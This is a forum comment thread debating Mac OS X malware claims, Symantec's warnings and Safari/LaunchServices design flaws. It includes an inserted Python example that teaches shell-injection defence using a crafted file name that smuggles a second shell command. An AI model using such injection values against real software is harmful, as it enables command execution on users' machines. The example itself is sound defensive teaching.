Like, every two weeks we see, "$ASSHAT_ANTI_VIRUS_COMPANY sez there is something not entirely unlike an OSX worm in the wild, and uh, Mac users have been lulled into a false sense of security, and uh no Mac user has ever actually seen a real virus in the wild because they're not all that popular, and um, like, we should all go buy us some Anti-Virus software."
Stop posting PR crap, please. Don't be a PR tool.
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
this logic simply is not valid. it omits inherent differences in security between unix variants and windows.
IF unix was only as inherently secure as windows, THEN it would have long since been thoroughly exploited BECAUSE unix has long housed some of the most mission-critical and profitable data out there (and therefore some of the most profitable data to be gained by exploiting said systems)
A year spent in artificial intelligence is enough to make one believe in God.
You guys must be kidding right?
I have seen worms in apples, but Trojan horses??? Naaaa..... That's just belloni!
If it was even primarily market share the number of worms, viruses, and other malware for Windows should have been higher through the '90s, and followed a continual upward curve against a matching downward curve for Macs. But that didn't happen... instead, after 1997 there was a sudden massive surge in Windows worms and other exploits. This surge is correlated with and caused by the introduction of what was then called "Active Desktop".
Buffer overflows and the occasional string injection, these can be found on any browser and any OS, and can be quickly fixed without breaking working code. Social engineering attacks, these used to be the majority of worms... before Active Desktop if you were savvy to them keeping your eyes open was pretty much enough. Trojan horses, viruses hiding in innocent downloads, they became increasingly rare as the Web meant that people weren't passing shareware around on BBSes and maintaining "upload quotas" to keep their downloads working. Peer-to-peer brings that kind of thing back, but it's no longer the main distribution mechanism for shareware.
So, really, we should have relatively fewer virus problems now. People are getting more familiar with computers, and few people are caught out more than once by a worm hiding in an email message if they have a chance to think about the attachment, if they download it and then open it in their own time.
But something happened.
Back in the early '90s there was this joke going around the net about a virus that was so clever it would run if you just READ an email message! Everyone knew it was a joke, because NOBODY would be so stupid as to write an email program that let you do that, or if they did they'd back out of that as quick as the "WIZARD" hole was backed out of sendmail.
Then came Active Desktop, Active X, Active Content, a web browser and an email program that both used a display technology that was designed to download and run software without user intervention. I was horrified. I didn't know exactly what was going to happen, but I expected something nasty. And boy were my expectations fulfilled. Dozens, then hundreds, then thousands of attacks, and Microsoft didn't back it out! And it's still in there, and still used by spyware and viruses to sneak into people's machines without the user actively doing anything... at the most they may have to click a button on a dialog box that looks pretty much like the ones that come up regularly and have to be clicked away...
The fundamental problem, the thing that makes Windows so terribly attractive to virus writers, is that it's got this big "infect me harder" capability built in to the core of the OS that you can't remove or even fully disable.
This is so much easier that even the weaker versions of the same problem in Safari and Firefox are trivial by comparison. If the UNIX (Linux&OSX) desktop market share was 50% instead of 5% you'd still have orders of magnitude more viruses on Windows than Macs... because it's so much easier a target. Even if you turned off ALL the internal security and ran as "root" with no password, the "Security Zones" hole is so much deeper and harder to close that there's still no contest.
Do you think that everyone else sees the same shades of "only-black" and "only-white" that you see?
There is no such thing as "secure".
Is there such a thing as "more secure" or "less secure"?
Or do you earnestly believe that Windows = OS X = Linux = OpenBSD in terms of security?
Or will you parrot the same argument that marketshare=exploits?
Just curious, I like to understand how the mad man's mind works.
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
The upper limit of "security" is human stupidity. So you will never be 100% safe.
But you don't have to be.
Viruses, worms and trojans are only a problem when the infection rate is greater than the removal rate.
If machines get cleaned faster than they get infected, the virus, worm or trojan will die.
So the Mac's security model only has to be good enough to slow the infection rate below the removal rate.
You might hear rumours of someone's brother's friend's girlfriend's mother getting a "virus". But the reality is that more data will be lost because of human error than because of viruses, worms or trojans.
And that is the BEST that you can do.
There's a better solution.
1. Safari doesn't open ANYTHING executable, period. If it's got executable permissions, it can't be opened.
2. The Finder should implement an icon overlay showing that a file is executable. Like the shortcut arrow on Windows, except some kind of notification that this is not a document, but is a program.
3. The first time the system runs ANY new executable that has not been run before, it pops up a warning window: "Warning! You are trying to run . Please be aware that this is an untrusted program you are running for the first time on your system. If you weren't expecting this dialogue, or thought you were opening a document file, please press Cancel NOW!"
Perhaps not in those words, but something similar.
The main thing is number 2. Worms like this won't happen on Linux, because you have to mark programs as "executable", or you have to run them through your package manager. Plus, icons are specified exclusively by mime-type, not by the thing you download. Apple's .app system means you can fake out people by making a program or shell script look like a JPG or Word document, and there's no good visual cue as to what is a document and what is an application.
Providing that cue will eliminate this hole for 99% of users.
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Dupe...No Digg...er sorry wrong site. Still a dupe though.
This isn't about individuals. This is about the population of Mac users.
If it is 99% impossible to get a virus, but some idiot manages to, that idiot will have to find another idiot to pass it on to.
The 99%'s keep adding up. So there's 1% chance of finding the first idiot.
There's only a 0.1% chance of finding the second idiot.
0.01% of finding a third idiot. 0.001% of finding the next, etc.
Meanwhile, there is a 0.001% chance of your hard drive failing. So, mathematically, you will lose data because your harddrive crashed BEFORE you will be infected with a virus.
You're more at risk of losing your data because your house burned down.
Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
It's a pity Apple hasn't been paying more attention.
Two years ago, Apple got bit by Safari's blind trust of LaunchServices, at the same time Microsoft got hit by a hole in almost the same application on Windows. Instead of going "oh, maybe Safari shouldn't use the same database for finding helpers as desktop applications do", they went "oh, maybe the helper app database should try and guess if it's being used by an exploit".
That's the same kind of decision Microsoft made in the '90s when they came up with "Active Content" and "Security Zones", and it didn't work for them then. Microsoft isn't likely to back out of that, but, damn, Apple should have noticed what a big blunder that was.
At least they should have backed out of it the first time it came up.
I swear, that if a virus or trojan ever spread like wildfire on Linux boxes (come at me, all you boxen guys), that will truly be the year that Linux taketh over the desktop.
Am I finally gonna have to shell out for an antivirus program for my PowerBook?
I've been holding off so far because there isn't anything critical on there, and because Macs haven't been hit by any serious viruses. But if I start seeing real, dangerous, honest-to-God in-the-wild viruses that DON'T require me to be an idiot and type in my password to install, the time of innocence is passed.
Of course, Windows computers are still far worse in this regard. But once the "annoyance threshold" of buying/installing an antivirus program is crossed, a big advantage to Mac convenience is lost. And for most Joe Sixpack types, I'd guess that convenience is a bigger concern than security when it comes to viruses and virus-protection.
That got me thinking, what is an antivirus anyways?
So, basically, using an antivirus makes sense if its plugins repository (2) is updated faster than abused softwares are (1).
Given Apple's track record regarding security patches being applied on my machine before even reading about said patches on /. or macrumors, I'd say I'd be hard-pressed to find an antivirus dealer that can roll out patches to Apple's app faster than Apple can. I do think now that the antivirus model does make sense in the Microsoft world, but doesn't really make sense on a Mac, until Apple stops being proactive (yeah buzzword!) about security fixes.
One exception: a fresh OSX install exposed on the net would be an easy target. Apple should include a post-setup stage where all services are deactivated and the firewall brought up while all security patches are installed (or make the user sign with its own blood a "Don't update this machine, I really know what I may be exposed to and want to test anyway"). That would be a tad paranoïac, but...
We love Apple?
We hate Microsoft?
We still love Google, but they are starting to slip a bit?
Linux is bestest ever and ever?
RIAA and MPAA sux it?
Safari doesn't open ANYTHING executable, period.
That's half of a solution, but it would still leave the original hole open.
The Finder should implement an icon overlay showing that a file is executable.
That would be useful, but it would still leave the original hole open.
The first time the system runs ANY new executable that has not been run before, it pops up a warning window [...]
That's a REALLY bad idea, and it would still leave the original security hole open.
NEITHER of the other two demonstrated exploits, using URIs rather than file names, would have been prevented by this approach. In fact the second showed up after Apple implemented pretty much that approach for URIs.
It also would not have prevented this attack, because LaunchServices didn't open the executable... the shell did, and there are variations on this attack that don't require the script used in the attack to be executable.
As to why it's a bad idea... well, Microsoft has been trying to use the same "trying to detect whether an attack is underway at the last minute" approach since 1997. All it's done is teach people that the system comes up with stupid dialogs on a regular basis, so you just gotta approve them and go on if you want to keep working.
I've been supporting 150-400 people on Windows for over a decade now, and I've regularly had people come up to me, the same people... over and over again... telling me that they'd clicked on the wrong button in a dialog box and gotten infected. False positives from these kinds of last-minute checks are always going to be so much more numerous than valid alarms that all you're doing is adding noise to the user experience.
The right solution is to keep the attack at arms length and let the user at his own time make the decision. Popping up a routine and routinely approved dialog isn't giving the user time to do the right thing, it's encouraging a snap decision and that's bad user interface design.
1. Turn off "Open Safe Files After Downloading" by default.
2. Create a separate database of "Safe Applications". ONLY use these from web pages viewed in Safari or any other document from applications that deal with untrusted documents.
3. Don't put any kind of installer, disk image mounter, or archive extractor in that database.
But of these three, #2 is the most important.
Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X. Despite the fact that it inherits a large chunk of its code base from the relatively mature FreeBSD (as well as being descended from NeXTSTEP), Apple have added a vast amount of entirely new code to the system, purely because of the demands of the consumer, and as a result in terms of a general user experience (as in regular user stuff - no flamebait intended) I believe that Mac OS X has surpassed the experience currently possible with *BSD/Linux.
However, in doing so it has introduced a vast amount of new code:
-Spotlight
-Aqua
-WebKit
-Quicktime
et al.
All of these add in functionality and usability, but lots of new code means lots of room for error. No human can develop 100% bug free code when introducing new ideas with great speed. (As anyone using a cutting edge Linux kernel knows).
Apple could introduce an OpenBSD style audit (Rumour suggests that they don't even use automated checking for buffer overruns!), but the pace of development would suffer and Apple needs to be competitive with the overall rate of development of Windows if it will have any great success in the consumer market.
This is a natural consequence of rapid development.
If we want new features we will get new bugs and, to be honest, I'm surprised that the overall negative impact of such a strategy hasn't been even greater for Apple. But if there is any time to change their strategy, now is the time.
Nothing sucks like a Vax, nothing blows like a PowerMac G4
So someone downloads a virus, as long as they're not running as root/admin then they can just del/readd user account... wow, problem solved, unless I missed something here?
Menya zovut Shnur
These new security threats are no more threatening than a paraplegic kitten.
To me, that one is worth more than the rest of the Wired web site. Sadly, to me, Wired seems to be made up of noobs and wannabes that I really don't give them much credit. Their annual "vaporware" articles use a very narrow definition of vaporware, generally most products they declare to be vapor end up arriving within a year of such declaration.
Back when the DeCSS program got media notice, Wired posted an article suggesting that we should all give up our DVD drives so Lucas would release his Star Wars Trilogy onto DVD. I think I emailed them a rebuttal of about fifteen factual and logical errors in that one article.
The important news in this slashdot was completely overlooked. We've already heard about the bugs, but here's what's really important: Apple's response to the recent problems:
"Apple takes security very seriously. We're working on a fix so that this doesn't become something that could affect customers. Apple always advises Mac users to only accept files from vendors and Web sites that they know and trust."
If I recall correctly, it took Microsoft 8 days to release a patch for the WMF bug after it was discovered. In those 8 days, many computers were affected, but still, 8 days is impressive. Let's see how long it takes Apple...
Actually, though I still dislike Windows, it is not hard to use good common sense and secure your Windows machine. I had my box behind two firewalls (one software, one hardware), and when I wasn't using the Internet, I turned it off. This box stayed virus free for a full semester. At the end of the semester, I reformatted for spring cleaning, but I'm sure it could have gone longer. I imagine the same could go for MacOS, and definitely goes for *nix.
Want to find other gamers to play board and role playing game
there are OS vulnerabilities and application vulnerabilities.
And this is an OS vulnerability. On Mac OS X, LaunchServices is an OS component. It's the normal way to launch GUI applications, including helper applications from web browsers, like the shell in UNIX is the normal way to run command line applications. In UNIX, though, applications that have security concerns don't (or shouldn't ... you do see apps breaking this rule from time to time) call the shell to run applications... they fork() and exec() the desired application directly... because the shell's behaviour isn't controllable or fully predictable.
LaunchServices has many of the same problems. UNFORTUNATELY, there's no general "safe" way to open documents on OS X. It's possible to securely open applications if you know the right application, but it's more complex than just fork/exec, and you have to deal with the difference between old-style Carbon apps and Cocoa appdirs... so Safari and other programs use LaunchServices.
The lack of a "secure applications only" equivalent to LaunchServices is an OS vulnerability. One that must be fixed (alas, Apple didn't fix it the last two times around).
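The contrast drawn in the comments above, between pasting untrusted text into a shell command and exec'ing a helper directly from a separate "safe applications" table, can be seen in a small added example that is not taken from any poster's comment or from Apple's code. The viewer, the `SAFE_HELPERS` table, the hostile file name and the marker file are all constructed for illustration, and a POSIX system with `/bin/sh` is assumed.

```python
"""Launching a helper for untrusted content: shell string vs. direct exec."""
import shlex
import subprocess
import sys
import tempfile
from pathlib import Path

# Hypothetical helper for this example: a Python one-liner that reports the
# arguments it was started with. A browser would start a document viewer here.
VIEWER = [sys.executable, "-c", "import sys; print(repr(sys.argv[1:]))"]

# Constructed "safe applications" table, kept separate from the desktop's
# general file-association database. It lists only helpers meant to display
# untrusted content; installers, disk image mounters and archive extractors
# are deliberately absent, so those types are never opened automatically.
SAFE_HELPERS = {
    "application/pdf": VIEWER,
    "text/plain": VIEWER,
}

# Constructed hostile name: the double quote ends the quoting added by the
# caller, ';' starts a second command, '#' comments out the leftover quote.
HOSTILE_NAME = 'benign.pdf?"; echo x > INJECTED #'


def open_via_shell(name, workdir):
    """Vulnerable pattern: untrusted text is pasted into a shell command line."""
    command = '%s "%s"' % (shlex.join(VIEWER), name)
    return subprocess.run(command, shell=True, cwd=workdir,
                          capture_output=True, text=True)


def open_untrusted(name, content_type, workdir):
    """Hardened pattern: allow-listed helper, started directly with an argv list.

    Returns None when no safe helper is registered; the file then stays where
    it was downloaded until the user decides what to do with it.
    """
    helper = SAFE_HELPERS.get(content_type)
    if helper is None:
        return None
    # An argv list without shell=True makes subprocess fork and exec the
    # helper itself. No shell parses `name`, so quotes and ';' are ordinary
    # characters inside one argument.
    return subprocess.run(helper + [name], cwd=workdir,
                          capture_output=True, text=True)


def demo():
    """Run both launchers on the hostile name and report what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        open_via_shell(HOSTILE_NAME, d)
        results["shell_injected"] = (Path(d) / "INJECTED").exists()
    with tempfile.TemporaryDirectory() as d:
        done = open_untrusted(HOSTILE_NAME, "application/pdf", d)
        results["direct_injected"] = (Path(d) / "INJECTED").exists()
        results["direct_argv"] = done.stdout.strip()
        archive = open_untrusted("bundle.zip", "application/zip", d)
        results["archive_opened"] = archive is not None
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Real helpers may still treat a name that begins with `-` as an option, so a launcher of this kind should also pass a full path or the helper's own end-of-options marker.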
Symantec speaking badly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.
They will only be able to demonize Macs for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.
BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
before it is found
The point of the grand-parent was that the primary use of the worms/Trojans/virus is for commercial purposes, not diabolical purposes (grand destruction of data accompanied by an evil laugh and stroking of the handle-bar mustache). For the infiltration to succeed, the malware needs to be slow and quiet in its attempt to proliferate. "Send to all" viruses are immediately identifiable by the amount of traffic they generate (e.g. Beagle and variants).
Therefore, the main resource that a zero-day exploit utilizes (stealth and time before patching) are mitigated by the fact that some of the e-mails are sent to dead ends. Processing power, bandwidth, etc. are all incidental as long as they're not limiting.
Think of the electricity usage!
Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X.
Yes, it bloody well can.
A key part of this attack should have been closed almost two years ago but Apple 'fixed' the wrong thing.
And they know there's a problem with LaunchServices, because in Tiger they allow you to override the types of files Safari considers "safe"... unfortunately they still use the LaunchServices database which leaves the "injection" problem intact.
So... Apple can fix these problems. Secure approaches are well known, and have been known for longer than Apple has existed as a company, and they know the problems exist. Why do they leave this hole open? I don't know, possibly because Microsoft does?
Please. MACs were NEVER immune. They were just ignored because only 1% of the populace had them. So welcome to reality - when you are WORTH being a target you will BECOME a target.
How many Mac users today run anti-virus software?
The naive ones.
So far the only actual damage I'm aware of caused by any of these trojan-horse worms on OS X has been caused by antivirus software incorrectly identifying uninfected files as them.
Similarly, the only cases I know of where malware has actually caused data-loss on Palms or Pocket PCs is where anti-virus software itself caused a problem or led to an overreaction after a false positive.
The most effective anti-virus software we've used on Windows has been Netscape. And we've lost more man-hours to problems caused by AV software than to trojan horses that people using Netscape have been convinced to download and open. IE is a different kettle of security holes, of course...
I would have to agree about Symantec software. It is bad for PCs, as well as for Macs, and I don't see it getting better anytime soon.
It is my belief, although I have no proof of this other than the software itself, that Symantec does not employ programmers. They seem to have become a behemoth of a company much like EA Games has become in the video game arena. My guess is that they retain a code base for their products and they pay consulting firms, perhaps located in India and/or China, to implement features and to create the next version. I feel that they have team leaders that come up with possible new features and coordinate tasks with consulting firms, but it seems fairly obvious that they shouldn't be considered a programming company.
I believe the software gets worse and worse with every release. It is a small deal to write a virus scanner, and it should be a simple task to write a virus scanner that runs efficiently. But, instead the program consumes many times more RAM than it should, eats up CPU cycles, has a horrible front-end (and an even worse one for home users), and a complicated support structure. The newest release of Corporate 10 is even worse with the implementation of anti-spyware. It has come to a point that Symantec, even on the PC, is a worse threat than even the malware.
Symantec buys up products from various products and then stamps their name on it. They take control of the project with little understanding of the internals and then it seems they outsource the work for it, which only compounds the problem. Heck, the only product I actually like now is Ghost and that was bought from Binary Research.
And the Norton Internet Security suites are even more evil. The number of times that the NIS has corrupted a computer is beyond counting...
So, from the quality of the work given such a simple concept it should be obvious that Symantec is disjointed and needs major fixing.
I miss the old DOS F-Prot scanner that bulletin board services used because it was small, fast and simple, and it was running on only a handful of MHz. This scanner is now free, and I still use it from time to time, but it is horrible to see how poor software quality has become after all these years.
"The optimist proclaims that we live in the best of all possible worlds, and the pessimist fears this is true." --James
Well, it's been almost two years and Apple's still sitting on the fix for the LaunchServices problems.
But then Microsoft's going for TEN years of not fixing their corresponding (and much more serious and harder to fix) design flaw, so Apple's not doing so bad.
Then a few are found when they are exploited in the wild by hackers.
As far as I know the only exploits in the wild involving OS X have been social engineering attacks... trojan horses convincing people to execute programs. These aren't security holes.
There are a few security holes that Apple has been reluctant to fix, maybe this time they'll be convinced to bite the bullet before someone DOES create an automated worm with them.
True. At the moment, I'm running OS X in a Managed user w/all but Terminal enabled 'just in case' I open a dodgy zip (though the only 'abusive' zips I've opened have been harmless vulnerability proof-of-concept demos).
It's a pain in the bum, a lot of things don't work w/out Terminal: Dashboard's been quirky, the ctrl+command+D dictionary shortcut doesn't work, etc. Plus, no terminal! This is the price I pay for the paranoia Windows has dragged me into over my decades as a Windows user (I only just switched this Jan)
It'd be nice if Apple could come up with something fairly pronto...
http://www.wired.com/news/columns/0,70257-0.html?
http://optimist.sdf-eu.org/ssp/
Take care !
At the moment, I'm running OS X in a Managed user w/all but Terminal enabled 'just in case' I open a dodgy zip
That's silly. If you turn off "Open Safe Files" and switch to something other than BOMArchiver for opening Zip archives then you'll be safe from attacks through other applications that have similar capabilities, AND you won't lose Terminal.
Terminal isn't the problem.
Safari and LaunchServices are the dysfunctional siblings that cause the problem. There's not much you can do about LaunchServices, other than avoiding the REAL application that's being exploited (BOMArchiver), but you can keep Safari from hurting you pretty easily.
I'd recommend installing Stuffit Expander but ONLY enable it for "zip", and turn off "Open Safe Files By Default", and quit worrying about the BOM.
The fact that windows is more popular is certainly part of why it has so many security flaws, but no operating system that runs with IPC ports open as default can make claims to be paying any attention to security.
James P. Barrett
Why hack a mac? Nobody does anything useful on them... ...aside from photoshop, and warcraft 3.
Now, that heat will be off of the Microsoft OS's.
It's all part of the 300 year world domination plan that Microsoft has.
Macintosh should have never accepted the 150 Million from Microsoft in 1997.
Maybe, now we will give those holier than thou Macintosh fanatics a piece of humble pie with a nice warm cup of shut the hell up.
While I must admit Apple does make some nice hardware for running Linux.
I love my Linux desktop with an occasional mix of Microsoft office products.
Any virus or trojan has two parts. The first is the route of infiltration, the second is the payload which has the ill effects.
OS vendors can take care of the 1st part, and they already do. In theory, with a perfect OS (and a perfect user), there is no need for an antivirus or antispyware application.
However users aren't perfect, and even with patched machines they double click hotmamas.jpg.exe or britneyspears.jpg.dmg and click yes yes yes... and then it's the job of tools like Symantec to identify and nullify the payloads (a vastly different problem than "securing the borders").
Virus scanners search for undesirable (yet valid) code. OS vendors would be hard pressed to categorize any code as such; they need to stay neutral. But they should at least make sure the OS is robust, so only what the user intends to run is what is actually run in the first place.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Actually, yes, I do. I can personally tell you about several Windows installations (up-to-date with updates) with anti-virus software (up-to-date), that were still completely taken down by malware. In fact, the antivirus software was specifically attacked and rendered useless in several of the cases. The users do not make a habit of opening anything that they do not know exactly who it is from.
So, yes, I know that many of the stories that we read about are from users who keep their systems up-to-date and use a bit of common sense. Yet Windows is still compromised.
I can't speak for Linux (too many distros to even begin speaking about all of them). I cannot tell you if OS X will survive a concerted attack like Windows gets. No one really knows until it happens (that goes for the supporters and critics equally). But I can tell you that Windows is full of problems even for prudent and prepared people. That much has been proven to me and that is what I tell my clients.
Marketing Guy at Symantec:
"Hey - people are starting to realize that anti-virus software for a Mac is totally worthless because there are no viruses! What do we do?"
Engineer at Symantec:
"Well...let me see - if you download this file, which sorta looks like it could be an image, double click it, and then hit OK twice, you could theoretically install malicious software on your Mac. But from what I know, nobody's ever done that...."
Marketing Guy:
"GREAT! I'll let the guy at the WSJ know about the epidemic right away!"
LOL. That's probably close to word-for-word what was said.
Doug and his Doug OS 3.2, yah he doesn't have to worry about viruses or worms and such, no published system flaws, and he doesn't miss an opportunity to rub my face in it for using windows, but sooner or later once he gets past .00001 market share, his day will come, oh yes his day will surely come.. that's when I get to gloat.. mwuahhaha.
"seriously if you have to manually download the program and enter your admin password, it is not a virus or a worm. I dont know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script."
From the article:
"Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Vote for Pedro
I submitted a better article than this yesterday and it was rejected. Symantec still has an unpatched security hole that affects all platforms including OS X, McAfee's support of the mac platform has been dubious at best, and last week the hot topic on the macenterprise.org mailing list was that Sophos will generate false positives on the mac platform and quarantine or delete legitimate clean apps. I've installed Clamxav, made sure auto-opening of "safe" files is turned off, made sure unnecessary services are turned off and firewalled, and set a strong password for SSH. Come and get me.
First of all, it should be no surprise that virus protection companies are the ones who are the most vocal about these potential Mac OS X vulnerabilities. Without Mac viruses, they have no product to sell to the increasing numbers of Mac users.
Leap-A (the iChat worm) is essentially an executable disguised as a JPEG image file and requires the potential target user to manually accept the file download and then manually open the executable. Even Symantec classes the malware as a low threat because it doesn't automatically infect others' machines. The company says it has seen less than 50 infected machines.
The second piece of Mac OS X malware, Inqtana.A, is a Java-based "proof of concept" that exploits a vulnerability in the Bluetooth implementation in versions of Mac OS X that haven't been updated with security patches (specifically, Mac OS X 10.4.0). Inqtana.A exploits a vulnerability whereby it causes the affected machine to automatically send an Object Exchange (OBEX) Push request to any other system listening over Bluetooth. To spread, the targeted user must manually accept the data transfer. Again, this threat does not automatically infect others' machines.
Additionally, this potential Bluetooth exploit was actually documented way back in May 2005 and Apple issued a security update in June 2005 that closed the hole (Apple Security Update 2005-006). Apple also integrated that security change into all versions of Mac OS X starting with v10.4.1.
The worms that have made headline news, and now seem almost commonplace for Windows users, are the ones that spread without any user interaction due to the poor default configuration and automatic code execution of Windows -- they can infect millions of machines on the internet in hours.
The only relevant part of the article comes at the very end:
"Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called ''social engineering'' techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs."
"Rather than weaknesses in operating systems, such approaches exploit ''a bug in peoples' brains, which is much harder to patch,'' Mr. Cluley says."
Leander Kahney of Wired echoes exactly my sentiments on these events:
http://www.wired.com/news/columns/0,70257-0.html?tw=wn_index_25
By the way, the Safari vulnerability talked about in the above Wired article can be attributed to poor program defaults (along with poorly tested code for backwards-compatibility to Mac OS 9) and can be completely avoided by disabling the "Open safe files after downloading" preference in Safari. Keep in mind that Safari is just an application program which runs on Mac OS X and is not integrated into it in the way that Internet Explorer is integrated into Windows. Even if this vulnerability could not be mitigated by a simple preference toggle, you could just uninstall Safari (a matter of simply dragging its icon into the trash) and install a different web browser in its stead (such as Mozilla Firefox). That's something you just can't do with Internet Explorer or other parts of Windows.
And in response to all the smug Windows apologists who think these recent developments prove that no operating system is truly safer than another and the number of exploits for an operating system are directly proportional to market share, I have this to say:
There were approximately 16,000 new viruses that targeted Windows XP in 2005. There have been 2, count them, 2 pieces of malware that targeted Mac OS X since 2001 (when Mac OS X was originally released). Taking market share into account (Windows XP at roughly 80% and Mac OS X at roughly 4%), we can extrapolate that there should have been 20,000 new viruses across all operating systems in the last 12 months (16,000 / 80%). At this rate, Mac OS X should have had 800 new viruses in the last 12 mo
Schrödinger's cat is not amused—maybe.
"False logic. That is like saying that if tanks were more popular they would be less secure than light armored vehicles"
If MacOS is so secure, why do they keep releasing security updates? How often have linux web servers been defaced? I don't think unix variants are as secure as you think they are.
Vote for Pedro
Can anyone cite any information on these alleged mac worms?
All this is sensible.. but so far nobody has shown an actual worm or virus in the wild that targets OS X.
So far this sounds like pure conjecture.
Firstly, I note that it was the Wall Street Journal that led the way in saying that Apple was doomed. This was pre-Jobs and was when their stock was selling for about $14 per share. I bought Apple stock that year.
I made my purchase thinking that the sale of the technology in the company, assuming a bankruptcy, would cover a $14 share price. The industrial design was what saved it.
Now Jobs is back. The WSJ is hacked because their bets didn't pay off.
So they go searching for a bedfellow -- let's see, someone like Symantec who hasn't been able to make any good code at all for Apple Macintosh computers since the dawn of OS X to analyze their system.
Now this is probably the hallmark of the WSJ's reporting on Apple: "Let's get someone who absolutely cannot understand Apple's operating system to comment on it. Then, let's publish what they say as if they actually had standing in the Mac community like they still do in the pee cee community and see if we can confuse the issue even more."
Better yet: "Let's go out and rewrite and publish a press release put out by that company as if it were our own story (which is much of what you read about companies in the WSJ) without checking up on their bona-fides. After all, we need filler because our ad people have just sold another three or four more pages of ads and we're running out of copy."
There has been one incident of malware noted in the wild that ran on Apple's OS X (assuming you discount Sony's DRM scam) and it warned you. Since Windoze XP has come out, how many incidents of malware have been noted?
Apple's OS isn't absolutely impregnable -- hardly anything is -- but that does not give Symantec or the Wall Street Urinal (sic.) license to fabricate.
Gods don't kill people, people with gods kill people.
Steps to understanding a mad man....
1) Take notes the next time you think
2) Take said notes (if legible) to head doctor for translation
3) REPEAT until understood.
Yes, this could be considered an infinite loop, but that's not my problem...
No kidding.
A virus is like the "cold" you catch because you didn't wear enough layers and the low body temperature made your immune system weak.
Or the random virus circulating the Interweb that infiltrated an exploit in your program/OS because you didn't get the latest patches.
On the other hand, this is more like...
Someone giving you a handgun and telling you it's a can of whipped cream. You put it to your mouth, pull the trigger, and blow a chunk of your cheek off.
Or someone giving you a file, telling you it's a program illustrating Lindsay Lohan clad in whipped cream. You put it in your computer, type in your root password, install it, and blow a chunk of your OS off.
- shazow
2.) Nobody said that a user couldn't make a system insecure. I can install a telnet server on my computer with an administrator logon with no password. This would be idiotic and extremely insecure but it isn't the fault of the OS and therefore is NOT relevant in any way to this discussion.
It is true that there ARE no secure OSs at the moment. Since no OS has been completely and utterly designed with only security in mind (Reference: the secure box is the unplugged box joke). No one has proven that the concept is not possible however, and I challenge you to come up with a proof. For example: I'm pretty sure that it would be a fairly simple task to create an OS to run just a network driver and a monitor that would connect to the internet and download static web pages only that would have no security bugs whatsoever. Now that would be pretty useless but your premise that "THERE IS NO SUCH THING AS A SECURE OS" is in theory (though currently not in practice) ridiculous.
All these dumb media outlets that don't understand what they are reporting. None of these latest attempts at the Apple OS security are a major threat. People are just envious of Apple's current fanfare. I am surprised the article didn't predict Apple going out of business like they have for the last 20 years.
Cool. Saves me the trouble of reaching for the power button myself. Not that I ever turn it off, for that matter.
Duct tape is like the Force. It has a light side, a dark side, and it holds the universe together.
Do they mean turn on as in power on, or do they mean Macs get hot & bothered by worms?
https://www.eff.org/https-everywhere
You sir, are an idiot. Almost all DOS viruses and most Windows viruses require you to manually execute the infected program to spread it. So I guess 99% of what has been called 'viruses' are just trojans, according to your "expert" opinion. Remember the Melissa virus? That required you to manually run the e-mail attachment. These kinds of viruses are VERY COMMON.
1. Please find me a reputable definition of a virus that says it can't require you to enter a password.
2. Please find me a reputable definition of a virus that says you can't manually run it.
Virus: A program that infects other programs in order to spread.
Worm: A program that spreads itself over an internet connection. Some definitions require it to directly open an internet connection (use sockets) rather than piggy backing on some other service.
Trojan: Malicious program disguised as a legitimate one. Does not spread.
In the case of the recent OS X malware, it was both a worm and a virus. It attempts to infect local executables. It also attempts to send itself via iChat.
I wish Apple apologists doing damage control after a bona fide virus/worm has shown up for their platform. Just admit your error. Please, mod the other posts down into oblivion. I'm sick of them saying that "it's not a virus" when it fits the DE FACTO standard definitions that hackers, security experts and virus writers use.
Hackers are supposed to be good people, people who are masters of their domain and are willing to help out others. But unfortunately, the media (both print and online) almost always seems to tag the term hackers to someone who breaks into other people's computers. At least, on websites like Slashdot, I expected people to understand the meaning of 'Hackers' and 'Crackers'.
Perhaps just dealing with INTEL is enough to ruin everything. It's too bad MAC has such problems navigating about & performing chores in the first place. NEVER FORGET: "MAC IS CRAP". Signed: PHYSICIAN THOMAS STEWART VON DRASHEK M.D.
WINDOWS XP Service Pack -X- 396 mb. http://www.geocities.com/tsvondrashekmd/WASHINGTO
To be honest, I saw it coming... the sleek designs, the cute sounds, that sly come-hither stare. So "worms" (ahem) turn on Macs... that's their decision and they should be proud of it :)
Did you see the pool? They flipped the bitch!
Now that you mention it, I find this thread shallow and pedantic.
That would require the OS vendor to have, on file, a list of every binary of every version of every piece of software anyone would care to run on the system. (Viruses patch programs, so simple checksums don't really help you there). The most you could do is identify specific pieces of stand-alone malware, which is dwarfed by many other types of attacks.
This is an essentially impossible task, and it would suck for developers. It also puts the burden on the OS vendor to decide good vs. bad software. It's a sometimes arbitrary decision that is best serviced by having multiple competing vendors for an end-user to choose from (one that protects a user from softwares most out-of-line with that users' interests). The OS vendor could also abuse this position to reduce competition (not promptly signing or labeling software it doesn't like as "bad").
Yeah, so no. I think the current state-of-the-art (code fingerprinting and multiple vendors) is probably a more scalable, less big-brotherish solution.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
